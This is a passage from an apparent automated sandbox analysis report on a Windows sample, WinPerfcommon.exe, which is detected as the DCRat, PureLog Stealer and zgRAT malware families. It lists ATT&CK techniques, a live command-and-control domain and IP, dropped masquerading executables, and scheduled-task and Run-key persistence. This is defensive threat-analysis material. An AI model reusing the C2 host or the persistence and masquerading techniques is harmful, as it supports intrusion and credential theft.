                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                              Source: C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exeQueries volume information: C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exe VolumeInformation
                              Source: C:\Recovery\SgrmBroker.exeQueries volume information: C:\Recovery\SgrmBroker.exe VolumeInformation
                              Source: C:\Recovery\SgrmBroker.exeQueries volume information: C:\Recovery\SgrmBroker.exe VolumeInformation
                              Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
                              Source: C:\Program Files\Adobe\StartMenuExperienceHost.exeQueries volume information: C:\Program Files\Adobe\StartMenuExperienceHost.exe VolumeInformation
                              Source: C:\Program Files\Adobe\StartMenuExperienceHost.exeQueries volume information: C:\Program Files\Adobe\StartMenuExperienceHost.exe VolumeInformation
                              Source: C:\Recovery\SystemSettings.exeQueries volume information: C:\Recovery\SystemSettings.exe VolumeInformation
                              Source: C:\Recovery\SystemSettings.exeQueries volume information: C:\Recovery\SystemSettings.exe VolumeInformation
                              Source: C:\Users\user\Desktop\WinPerfcommon.exeQueries volume information: C:\Users\user\Desktop\WinPerfcommon.exe VolumeInformation
                              Source: C:\Users\user\Desktop\WinPerfcommon.exeQueries volume information: C:\Users\user\Desktop\WinPerfcommon.exe VolumeInformation
                              Source: C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exeQueries volume information: C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exe VolumeInformation
                              Source: C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                              Source: C:\Program Files\Adobe\StartMenuExperienceHost.exeQueries volume information: C:\Program Files\Adobe\StartMenuExperienceHost.exe VolumeInformation
                              Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
                              Source: C:\Users\user\Desktop\WinPerfcommon.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                              Source: pzPgKRlGoglDaRzDTBMXwbN.exe, 00000031.00000002.1850754323.000000001BA22000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                              Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
                              Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct
                              Source: C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
                              Source: C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct

                              Stealing of Sensitive Information

                              barindex
                              Yara detected DCRat
                              Source: Yara matchFile source: 00000000.00000002.1786930163.0000000012A0C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: Process Memory Space: WinPerfcommon.exe PID: 6664, type: MEMORYSTR
                              Source: Yara matchFile source: Process Memory Space: pzPgKRlGoglDaRzDTBMXwbN.exe PID: 8004, type: MEMORYSTR
                              Source: Yara matchFile source: Process Memory Space: StartMenuExperienceHost.exe PID: 7100, type: MEMORYSTR
                              Yara detected PureLog Stealer
                              Source: Yara matchFile source: WinPerfcommon.exe, type: SAMPLE
                              Source: Yara matchFile source: 0.0.WinPerfcommon.exe.300000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 00000000.00000000.1682029675.0000000000302000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                              Source: Yara matchFile source: C:\Recovery\SystemSettings.exe, type: DROPPED
                              Source: Yara matchFile source: C:\Program Files\Adobe\StartMenuExperienceHost.exe, type: DROPPED
                              Source: Yara matchFile source: C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exe, type: DROPPED
                              Source: Yara matchFile source: C:\Recovery\SgrmBroker.exe, type: DROPPED
                              Yara detected zgRAT
                              Source: Yara matchFile source: WinPerfcommon.exe, type: SAMPLE
                              Source: Yara matchFile source: 0.0.WinPerfcommon.exe.300000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: C:\Recovery\SystemSettings.exe, type: DROPPED
                              Source: Yara matchFile source: C:\Program Files\Adobe\StartMenuExperienceHost.exe, type: DROPPED
                              Source: Yara matchFile source: C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exe, type: DROPPED
                              Source: Yara matchFile source: C:\Recovery\SgrmBroker.exe, type: DROPPED

                              Remote Access Functionality

                              barindex
                              Yara detected DCRat
                              Source: Yara matchFile source: 00000000.00000002.1786930163.0000000012A0C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: Process Memory Space: WinPerfcommon.exe PID: 6664, type: MEMORYSTR
                              Source: Yara matchFile source: Process Memory Space: pzPgKRlGoglDaRzDTBMXwbN.exe PID: 8004, type: MEMORYSTR
                              Source: Yara matchFile source: Process Memory Space: StartMenuExperienceHost.exe PID: 7100, type: MEMORYSTR
                              Yara detected PureLog Stealer
                              Source: Yara matchFile source: WinPerfcommon.exe, type: SAMPLE
                              Source: Yara matchFile source: 0.0.WinPerfcommon.exe.300000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 00000000.00000000.1682029675.0000000000302000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                              Source: Yara matchFile source: C:\Recovery\SystemSettings.exe, type: DROPPED
                              Source: Yara matchFile source: C:\Program Files\Adobe\StartMenuExperienceHost.exe, type: DROPPED
                              Source: Yara matchFile source: C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exe, type: DROPPED
                              Source: Yara matchFile source: C:\Recovery\SgrmBroker.exe, type: DROPPED
                              Yara detected zgRAT
                              Source: Yara matchFile source: WinPerfcommon.exe, type: SAMPLE
                              Source: Yara matchFile source: 0.0.WinPerfcommon.exe.300000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: C:\Recovery\SystemSettings.exe, type: DROPPED
                              Source: Yara matchFile source: C:\Program Files\Adobe\StartMenuExperienceHost.exe, type: DROPPED
                              Source: Yara matchFile source: C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exe, type: DROPPED
                              Source: Yara matchFile source: C:\Recovery\SgrmBroker.exe, type: DROPPED

                              Mitre Att&ck Matrix

                              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                              Gather Victim Identity Information1
                              Scripting                              		Valid Accounts241
                              Windows Management Instrumentation                              		1
                              Scripting                              		1
                              DLL Side-Loading                              		11
                              Disable or Modify Tools                              		OS Credential Dumping2
                              File and Directory Discovery                              		1
                              Taint Shared Content                              		1
                              Archive Collected Data                              		2
                              Ingress Tool Transfer                              		Exfiltration Over Other Network MediumAbuse Accessibility Features
                              CredentialsDomainsDefault Accounts1
                              Scheduled Task/Job                              		1
                              DLL Side-Loading                              		11
                              Process Injection                              		2
                              Obfuscated Files or Information                              		LSASS Memory34
                              System Information Discovery                              		Remote Desktop ProtocolData from Removable Media1
                              Encrypted Channel                              		Exfiltration Over BluetoothNetwork Denial of Service
                              Email AddressesDNS ServerDomain AccountsAt1
                              Scheduled Task/Job                              		1
                              Scheduled Task/Job                              		2
                              Software Packing                              		Security Account Manager241
                              Security Software Discovery                              		SMB/Windows Admin SharesData from Network Shared Drive3
                              Non-Application Layer Protocol                              		Automated ExfiltrationData Encrypted for Impact
                              Employee NamesVirtual Private ServerLocal AccountsCron31
                              Registry Run Keys / Startup Folder                              		31
                              Registry Run Keys / Startup Folder                              		1
                              DLL Side-Loading                              		NTDS1
                              Process Discovery                              		Distributed Component Object ModelInput Capture13
                              Application Layer Protocol                              		Traffic DuplicationData Destruction
                              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                              File Deletion                              		LSA Secrets151
                              Virtualization/Sandbox Evasion                              		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts133
                              Masquerading                              		Cached Domain Credentials1
                              Application Window Discovery                              		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items151
                              Virtualization/Sandbox Evasion                              		DCSync1
                              Remote System Discovery                              		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job11
                              Process Injection                              		Proc Filesystem1
                              System Network Configuration Discovery                              		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                              Behavior Graph

                              Hide Legend

                              Legend:

                              • Process
                              • Signature
                              • Created File
                              • DNS/IP Info
                              • Is Dropped
                              • Is Windows Process
                              • Number of created Registry Values
                              • Number of created Files
                              • Visual Basic
                              • Delphi
                              • Java
                              • .Net C# or VB.NET
                              • C, C++ or other language
                              • Is malicious
                              • Internet
                              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1589192 Sample: WinPerfcommon.exe Startdate: 11/01/2025 Architecture: WINDOWS Score: 100 77 fsin.top 2->77 83 Suricata IDS alerts for network traffic 2->83 85 Found malware configuration 2->85 87 Antivirus detection for URL or domain 2->87 89 14 other signatures 2->89 10 WinPerfcommon.exe 12 35 2->10         started        14 pzPgKRlGoglDaRzDTBMXwbN.exe 2 2->14         started        16 SgrmBroker.exe 2->16         started        18 9 other processes 2->18 signatures3 process4 file5 61 C:\Windows\...\pzPgKRlGoglDaRzDTBMXwbN.exe, PE32 10->61 dropped 63 C:\Users\user\Desktop\zsLwvutf.log, PE32 10->63 dropped 65 C:\Users\user\Desktop\zGtWfQBc.log, PE32 10->65 dropped 67 16 other malicious files 10->67 dropped 101 Creates an undocumented autostart registry key 10->101 103 Creates multiple autostart registry keys 10->103 105 Creates an autostart registry key pointing to binary in C:\Windows 10->105 115 4 other signatures 10->115 20 cmd.exe 10->20         started        23 csc.exe 4 10->23         started        26 powershell.exe 10->26         started        28 8 other processes 10->28 107 Antivirus detection for dropped file 14->107 109 Multi AV Scanner detection for dropped file 14->109 111 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 14->111 113 Machine Learning detection for dropped file 16->113 signatures6 process7 file8 91 Uses ping.exe to sleep 20->91 93 Uses ping.exe to check the status of other devices and networks 20->93 30 pzPgKRlGoglDaRzDTBMXwbN.exe 20->30         started        44 3 other processes 20->44 59 C:\Windows\...\SecurityHealthSystray.exe, PE32 23->59 dropped 95 Infects executable files (exe, dll, sys, html) 23->95 34 conhost.exe 23->34         started        36 cvtres.exe 1 23->36         started        97 Loading BitLocker PowerShell Module 26->97 46 2 other processes 26->46 99 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 28->99 38 schtasks.exe 28->38         started        40 schtasks.exe 28->40         started        42 schtasks.exe 28->42         started        48 13 other processes 28->48 signatures9 process10 dnsIp11 79 fsin.top 37.44.238.250, 49730, 49737, 62175 HARMONYHOSTING-ASFR France 30->79 69 C:\Users\user\Desktop\yHNOGCAC.log, PE32 30->69 dropped 71 C:\Users\user\Desktop\iFHJmzLo.log, PE32 30->71 dropped 73 C:\Users\user\Desktop\fyKARhRs.log, PE32 30->73 dropped 75 5 other malicious files 30->75 dropped 50 cmd.exe 30->50         started        file12 process13 signatures14 81 Uses ping.exe to sleep 50->81 53 conhost.exe 50->53         started        55 chcp.com 50->55         started        57 PING.EXE 50->57         started        process15

                              Screenshots

                              Thumbnails

                              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                              windows-stand

                              Antivirus, Machine Learning and Genetic Malware Detection

                              Initial Sample

                              SourceDetectionScannerLabelLink
                              WinPerfcommon.exe63%ReversingLabsByteCode-MSIL.Trojan.DCRat
                              WinPerfcommon.exe70%VirustotalBrowse
                              WinPerfcommon.exe100%AviraHEUR/AGEN.1323342
                              WinPerfcommon.exe100%Joe Sandbox ML

                              Dropped Files

                              SourceDetectionScannerLabelLink
                              C:\Recovery\SgrmBroker.exe100%AviraHEUR/AGEN.1323342
                              C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exe100%AviraHEUR/AGEN.1323342
                              C:\Users\user\AppData\Local\Temp\BUc8lPV5KF.bat100%AviraBAT/Delbat.C
                              C:\Users\user\AppData\Local\Temp\bCL7Nxg3GW.bat100%AviraBAT/Delbat.C
                              C:\Recovery\SystemSettings.exe100%AviraHEUR/AGEN.1323342
                              C:\Program Files\Adobe\StartMenuExperienceHost.exe100%AviraHEUR/AGEN.1323342
                              C:\Recovery\SgrmBroker.exe100%Joe Sandbox ML
                              C:\Users\user\Desktop\GEhWIfwR.log100%Joe Sandbox ML
                              C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exe100%Joe Sandbox ML
                              C:\Recovery\SystemSettings.exe100%Joe Sandbox ML
                              C:\Program Files\Adobe\StartMenuExperienceHost.exe100%Joe Sandbox ML
                              C:\Users\user\Desktop\EAqnjiFq.log100%Joe Sandbox ML
                              C:\Program Files\Adobe\StartMenuExperienceHost.exe63%ReversingLabsByteCode-MSIL.Trojan.DCRat
                              C:\Recovery\SgrmBroker.exe63%ReversingLabsByteCode-MSIL.Trojan.DCRat
                              C:\Recovery\SystemSettings.exe63%ReversingLabsByteCode-MSIL.Trojan.DCRat
                              C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exe63%ReversingLabsByteCode-MSIL.Trojan.DCRat
                              C:\Users\user\Desktop\EAqnjiFq.log8%ReversingLabs
                              C:\Users\user\Desktop\GEhWIfwR.log8%ReversingLabs
                              C:\Users\user\Desktop\GKMojBlr.log38%ReversingLabsByteCode-MSIL.Trojan.Generic
                              C:\Users\user\Desktop\PipMsYLy.log38%ReversingLabsByteCode-MSIL.Trojan.Generic
                              C:\Users\user\Desktop\PoUdTuAY.log33%ReversingLabsWin32.Ransomware.Bitpy
                              C:\Users\user\Desktop\YLyBcRbf.log33%ReversingLabsWin32.Ransomware.Bitpy
                              C:\Users\user\Desktop\ZQJbcBRg.log9%ReversingLabs
                              C:\Users\user\Desktop\ZWotDWGG.log9%ReversingLabs
                              C:\Users\user\Desktop\fyKARhRs.log25%ReversingLabs
                              C:\Users\user\Desktop\iFHJmzLo.log50%ReversingLabsByteCode-MSIL.Trojan.DCRat
                              C:\Users\user\Desktop\izcrMdWN.log50%ReversingLabsByteCode-MSIL.Trojan.DCRat
                              C:\Users\user\Desktop\yHNOGCAC.log71%ReversingLabsByteCode-MSIL.Trojan.DCRat
                              C:\Users\user\Desktop\zGtWfQBc.log71%ReversingLabsByteCode-MSIL.Trojan.DCRat
                              C:\Users\user\Desktop\zsLwvutf.log25%ReversingLabs
                              C:\Windows\Installer\pzPgKRlGoglDaRzDTBMXwbN.exe63%ReversingLabsByteCode-MSIL.Trojan.DCRat

                              Unpacked PE Files

                              No Antivirus matches

                              Domains

                              No Antivirus matches

                              URLs

                              SourceDetectionScannerLabelLink
                              http://fsin.top/javascriptCentraldownloads.php100%Avira URL Cloudphishing
                              http://fsin.top/100%Avira URL Cloudphishing
                              http://fsin.top100%Avira URL Cloudphishing
                              http://crl.micros-0%Avira URL Cloudsafe

                              Domains and IPs

                              Contacted Domains

                              NameIPActiveMaliciousAntivirus DetectionReputation
                              fsin.top
                              		37.44.238.250
                              		truetrue
                                		unknown

                                Contacted URLs

                                NameMaliciousAntivirus DetectionReputation
                                http://fsin.top/javascriptCentraldownloads.phptrue
                                • Avira URL Cloud: phishing
                                		unknown

                                URLs from Memory and Binaries

                                NameSourceMaliciousAntivirus DetectionReputation
                                http://fsin.top/pzPgKRlGoglDaRzDTBMXwbN.exe, 00000031.00000002.1842118117.0000000003393000.00000004.00000800.00020000.00000000.sdmptrue
                                • Avira URL Cloud: phishing
                                		unknown
                                http://nuget.org/NuGet.exepowershell.exe, 00000016.00000002.2849335154.0000020310213000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.2934001847.000001D696DE3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.3054085979.000001B49D854000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.2991988808.0000022337724000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000020.00000002.2936625519.00000158A8F74000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  http://schemas.micpowershell.exe, 0000001A.00000002.3321971491.000001D69EEA0000.00000004.00000020.00020000.00000000.sdmpfalse
                                    		high
                                    http://fsin.toppzPgKRlGoglDaRzDTBMXwbN.exe, 00000031.00000002.1842118117.0000000003544000.00000004.00000800.00020000.00000000.sdmp, pzPgKRlGoglDaRzDTBMXwbN.exe, 00000031.00000002.1842118117.0000000003393000.00000004.00000800.00020000.00000000.sdmptrue
                                    • Avira URL Cloud: phishing
                                    		unknown
                                    http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000020.00000002.1870782113.000001589912A000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000016.00000002.1860699365.00000203003C9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.1885805844.000001FAE5EF7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1869672949.000001D686F98000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.1879031219.000001B48DA08000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.1869974857.00000223278D9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000020.00000002.1870782113.000001589912A000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000020.00000002.1870782113.000001589912A000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000016.00000002.1860699365.00000203003C9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.1885805844.000001FAE5EF7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1869672949.000001D686F98000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.1879031219.000001B48DA08000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.1869974857.00000223278D9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000020.00000002.1870782113.000001589912A000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            http://www.micom/pkiops/Docs/ry.htm0powershell.exe, 00000016.00000002.3291842516.0000020318590000.00000004.00000020.00020000.00000000.sdmpfalse
                                              		high
                                              https://contoso.com/powershell.exe, 00000020.00000002.2936625519.00000158A8F74000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                https://nuget.org/nuget.exepowershell.exe, 00000016.00000002.2849335154.0000020310213000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.2934001847.000001D696DE3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.3054085979.000001B49D854000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.2991988808.0000022337724000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000020.00000002.2936625519.00000158A8F74000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  http://crl.micros-powershell.exe, 00000018.00000002.3236041998.000001FAFDD60000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.microsoft.copowershell.exe, 0000001A.00000002.3321971491.000001D69EEA0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://contoso.com/Licensepowershell.exe, 00000020.00000002.2936625519.00000158A8F74000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://contoso.com/Iconpowershell.exe, 00000020.00000002.2936625519.00000158A8F74000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://aka.ms/pscore68powershell.exe, 00000016.00000002.1860699365.00000203001A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.1885805844.000001FAE5CD1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1869672949.000001D686D71000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.1879031219.000001B48D7E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.1869974857.00000223276B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000020.00000002.1870782113.0000015898F12000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		high
                                                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameWinPerfcommon.exe, 00000000.00000002.1747143226.0000000002B85000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.1860699365.00000203001A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.1885805844.000001FAE5CD1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1869672949.000001D686D71000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.1879031219.000001B48D7E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.1869974857.00000223276B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000020.00000002.1870782113.0000015898F12000.00000004.00000800.00020000.00000000.sdmp, pzPgKRlGoglDaRzDTBMXwbN.exe, 00000031.00000002.1842118117.0000000003303000.00000004.00000800.00020000.00000000.sdmp, pzPgKRlGoglDaRzDTBMXwbN.exe, 00000031.00000002.1842118117.0000000003934000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://github.com/Pester/Pesterpowershell.exe, 00000020.00000002.1870782113.000001589912A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              http://crl.microspowershell.exe, 00000016.00000002.3285415906.0000020318470000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                		high

                                                                World Map of Contacted IPs

                                                                • No. of IPs < 25%
                                                                • 25% < No. of IPs < 50%
                                                                • 50% < No. of IPs < 75%
                                                                • 75% < No. of IPs

                                                                Public IPs

                                                                IPDomainCountryFlagASNASN NameMalicious
                                                                37.44.238.250
                                                                		fsin.topFrance
                                                                		49434HARMONYHOSTING-ASFRtrue

                                                                General Information

                                                                Joe Sandbox version:42.0.0 Malachite
                                                                Analysis ID:1589192
                                                                Start date and time:2025-01-11 16:19:05 +01:00
                                                                Joe Sandbox product:CloudBasic
                                                                Overall analysis duration:0h 10m 24s
                                                                Hypervisor based Inspection enabled:false
                                                                Report type:full
                                                                Cookbook file name:default.jbs
                                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                Number of analysed new started processes analysed:72
                                                                Number of new started drivers analysed:0
                                                                Number of existing processes analysed:0
                                                                Number of existing drivers analysed:0
                                                                Number of injected processes analysed:0
                                                                Technologies:
                                                                • HCA enabled
                                                                • EGA enabled
                                                                • AMSI enabled
                                                                Analysis Mode:default
                                                                Sample name:WinPerfcommon.exe
                                                                Detection:MAL
                                                                Classification:mal100.spre.troj.expl.evad.winEXE@67/71@1/1
                                                                EGA Information:Failed
                                                                HCA Information:Failed
                                                                Cookbook Comments:
                                                                • Found application associated with file extension: .exe

                                                                Warnings

                                                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, Conhost.exe, SIHClient.exe, conhost.exe, schtasks.exe
                                                                • Excluded IPs from analysis (whitelisted): 172.202.163.200, 13.107.246.45
                                                                • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, 4.8.2.0.0.0.0.0.0.0.0.0.0.0.0.0.2.0.0.0.2.0.c.0.0.3.0.1.3.0.6.2.ip6.arpa, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                • Execution Graph export aborted for target StartMenuExperienceHost.exe, PID 7100 because it is empty
                                                                • Execution Graph export aborted for target WinPerfcommon.exe, PID 6664 because it is empty
                                                                • Execution Graph export aborted for target pzPgKRlGoglDaRzDTBMXwbN.exe, PID 8004 because it is empty
                                                                • Not all processes where analyzed, report is missing behavior information
                                                                • Report size exceeded maximum capacity and may have missing behavior information.
                                                                • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                • Report size getting too big, too many NtCreateKey calls found.
                                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                • Report size getting too big, too many NtQueryValueKey calls found.

                                                                Simulations

                                                                Behavior and APIs

                                                                TimeTypeDescription
                                                                10:20:04API Interceptor191x Sleep call for process: powershell.exe modified
                                                                10:20:13API Interceptor1x Sleep call for process: pzPgKRlGoglDaRzDTBMXwbN.exe modified
                                                                15:20:02Task SchedulerRun new task: pzPgKRlGoglDaRzDTBMXwbN path: "C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exe"
                                                                15:20:02Task SchedulerRun new task: pzPgKRlGoglDaRzDTBMXwbNp path: "C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exe"
                                                                15:20:02Task SchedulerRun new task: SgrmBroker path: "C:\Recovery\SgrmBroker.exe"
                                                                15:20:02Task SchedulerRun new task: SgrmBrokerS path: "C:\Recovery\SgrmBroker.exe"
                                                                15:20:03Task SchedulerRun new task: StartMenuExperienceHost path: "C:\Program Files\Adobe\StartMenuExperienceHost.exe"
                                                                15:20:03Task SchedulerRun new task: StartMenuExperienceHostS path: "C:\Program Files\Adobe\StartMenuExperienceHost.exe"
                                                                15:20:03Task SchedulerRun new task: SystemSettings path: "C:\Recovery\SystemSettings.exe"
                                                                15:20:03Task SchedulerRun new task: SystemSettingsS path: "C:\Recovery\SystemSettings.exe"
                                                                15:20:03Task SchedulerRun new task: WinPerfcommonW path: "C:\Users\user\Desktop\WinPerfcommon.exe"
                                                                15:20:03AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run StartMenuExperienceHost "C:\Program Files\Adobe\StartMenuExperienceHost.exe"
                                                                15:20:06Task SchedulerRun new task: WinPerfcommon path: "C:\Users\user\Desktop\WinPerfcommon.exe"
                                                                15:20:12AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run pzPgKRlGoglDaRzDTBMXwbN "C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exe"
                                                                15:20:20AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run SystemSettings "C:\Recovery\SystemSettings.exe"
                                                                15:20:30AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run SgrmBroker "C:\Recovery\SgrmBroker.exe"
                                                                15:20:39AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run WinPerfcommon "C:\Users\user\Desktop\WinPerfcommon.exe"
                                                                15:20:48AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run StartMenuExperienceHost "C:\Program Files\Adobe\StartMenuExperienceHost.exe"
                                                                15:20:57AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run pzPgKRlGoglDaRzDTBMXwbN "C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exe"
                                                                15:21:06AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run SystemSettings "C:\Recovery\SystemSettings.exe"
                                                                15:21:16AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run SgrmBroker "C:\Recovery\SgrmBroker.exe"
